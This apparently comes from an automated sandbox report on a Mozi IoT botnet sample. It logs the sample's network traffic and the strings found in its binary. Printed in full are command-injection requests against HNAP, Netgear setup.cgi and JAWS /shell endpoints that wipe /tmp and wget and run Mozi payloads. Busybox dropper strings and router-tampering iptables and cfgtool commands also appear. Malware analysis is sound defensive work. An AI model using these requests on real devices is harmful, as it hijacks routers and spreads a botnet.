xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 38.35.98.151:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 199.204.251.131:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Sample listens on a socket
Source: /tmp/KnAY2OIPI3 (PID: 4619) Socket: 0.0.0.0::38798 Jump to behavior
Source: unknown TCP traffic detected without corresponding DNS query: 184.164.122.183
Source: unknown TCP traffic detected without corresponding DNS query: 51.93.41.179
Source: unknown TCP traffic detected without corresponding DNS query: 83.138.58.60
Source: unknown TCP traffic detected without corresponding DNS query: 77.89.211.235
Source: unknown TCP traffic detected without corresponding DNS query: 62.217.2.44
Source: unknown TCP traffic detected without corresponding DNS query: 172.58.106.47
Source: unknown TCP traffic detected without corresponding DNS query: 188.39.11.49
Source: unknown TCP traffic detected without corresponding DNS query: 21.167.23.229
Source: unknown TCP traffic detected without corresponding DNS query: 154.228.225.43
Source: unknown TCP traffic detected without corresponding DNS query: 142.185.51.138
Source: unknown TCP traffic detected without corresponding DNS query: 121.235.253.2
Source: unknown TCP traffic detected without corresponding DNS query: 29.145.147.14
Source: unknown TCP traffic detected without corresponding DNS query: 103.85.31.98
Source: unknown TCP traffic detected without corresponding DNS query: 19.118.150.224
Source: unknown TCP traffic detected without corresponding DNS query: 158.169.216.109
Source: unknown TCP traffic detected without corresponding DNS query: 18.203.169.48
Source: unknown TCP traffic detected without corresponding DNS query: 93.208.214.175
Source: unknown TCP traffic detected without corresponding DNS query: 133.43.111.70
Source: unknown TCP traffic detected without corresponding DNS query: 129.12.160.142
Source: unknown TCP traffic detected without corresponding DNS query: 94.167.107.6
Source: unknown TCP traffic detected without corresponding DNS query: 87.70.234.237
Source: unknown TCP traffic detected without corresponding DNS query: 12.106.20.19
Source: unknown TCP traffic detected without corresponding DNS query: 94.169.172.220
Source: unknown TCP traffic detected without corresponding DNS query: 41.177.29.19
Source: unknown TCP traffic detected without corresponding DNS query: 174.82.166.212
Source: unknown TCP traffic detected without corresponding DNS query: 192.127.211.209
Source: unknown TCP traffic detected without corresponding DNS query: 120.206.173.159
Source: unknown TCP traffic detected without corresponding DNS query: 147.73.77.123
Source: unknown TCP traffic detected without corresponding DNS query: 106.249.234.237
Source: unknown TCP traffic detected without corresponding DNS query: 23.216.220.40
Source: unknown TCP traffic detected without corresponding DNS query: 7.108.184.228
Source: unknown TCP traffic detected without corresponding DNS query: 109.176.26.151
Source: unknown TCP traffic detected without corresponding DNS query: 34.9.142.75
Source: unknown TCP traffic detected without corresponding DNS query: 204.86.91.239
Source: unknown TCP traffic detected without corresponding DNS query: 151.197.193.88
Source: unknown TCP traffic detected without corresponding DNS query: 117.254.218.74
Source: unknown TCP traffic detected without corresponding DNS query: 145.78.201.48
Source: unknown TCP traffic detected without corresponding DNS query: 181.228.162.132
Source: unknown TCP traffic detected without corresponding DNS query: 199.53.125.193
Source: unknown TCP traffic detected without corresponding DNS query: 105.32.8.235
Source: unknown TCP traffic detected without corresponding DNS query: 34.106.39.153
Source: unknown TCP traffic detected without corresponding DNS query: 196.16.113.212
Source: unknown TCP traffic detected without corresponding DNS query: 121.250.87.121
Source: unknown TCP traffic detected without corresponding DNS query: 80.230.157.194
Source: unknown TCP traffic detected without corresponding DNS query: 163.46.160.172
Source: unknown TCP traffic detected without corresponding DNS query: 119.52.222.172
Source: unknown TCP traffic detected without corresponding DNS query: 193.81.154.165
Source: unknown TCP traffic detected without corresponding DNS query: 54.133.190.191
Source: unknown TCP traffic detected without corresponding DNS query: 215.1.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 16.179.214.74
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 66.221.91.189:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 172.82.182.74:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 182.254.240.127:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 168.226.35.54:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 216.164.6.45:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 65.110.89.33:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 65.110.89.33:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 65.110.89.33:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 65.110.89.33:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 65.110.89.33:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 65.110.89.33:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 65.110.89.33:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 65.110.89.33:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: unknown DNS traffic detected: queries for: dht.transmissionbt.com
Source: unknown HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 164.132.44.102:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 01 May 2021 15:49:20 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: KnAY2OIPI3 String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: KnAY2OIPI3 String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: KnAY2OIPI3 String found in binary or memory: http://%s:%d/Mozi.m
Source: KnAY2OIPI3 String found in binary or memory: http://%s:%d/Mozi.m;
Source: KnAY2OIPI3 String found in binary or memory: http://%s:%d/Mozi.m;$
Source: KnAY2OIPI3 String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: KnAY2OIPI3 String found in binary or memory: http://%s:%d/bin.sh
Source: KnAY2OIPI3 String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: KnAY2OIPI3 String found in binary or memory: http://127.0.0.1
Source: KnAY2OIPI3 String found in binary or memory: http://127.0.0.1sendcmd
Source: KnAY2OIPI3 String found in binary or memory: http://HTTP/1.1
Source: KnAY2OIPI3 String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: .config.8.dr String found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
Source: KnAY2OIPI3 String found in binary or memory: http://ipinfo.io/ip
Source: alsa-info.sh0.8.dr String found in binary or memory: http://pastebin.ca)
Source: alsa-info.sh0.8.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
Source: alsa-info.sh0.8.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
Source: KnAY2OIPI3 String found in binary or memory: http://purenetworks.com/HNAP1/
Source: KnAY2OIPI3 String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: KnAY2OIPI3 String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: KnAY2OIPI3 String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org.
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org/alsa-info.sh
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org/cardinfo-db/
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.pastebin.ca
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.pastebin.ca.
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.pastebin.ca/upload.php

Spam, unwanted Advertisements and Ransom Demands:

barindex
Writes HTML files containing JavaScript to disk
Source: /tmp/KnAY2OIPI3 (PID: 4596) HTML file containing JavaScript created: /usr/networks Jump to dropped file

System Summary:

barindex
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: busybox
Source: Initial sample String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
Source: Initial sample String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/ls|more
Source: Initial sample String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
Source: Initial sample String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
Source: Initial sample String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
Source: Initial sample String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
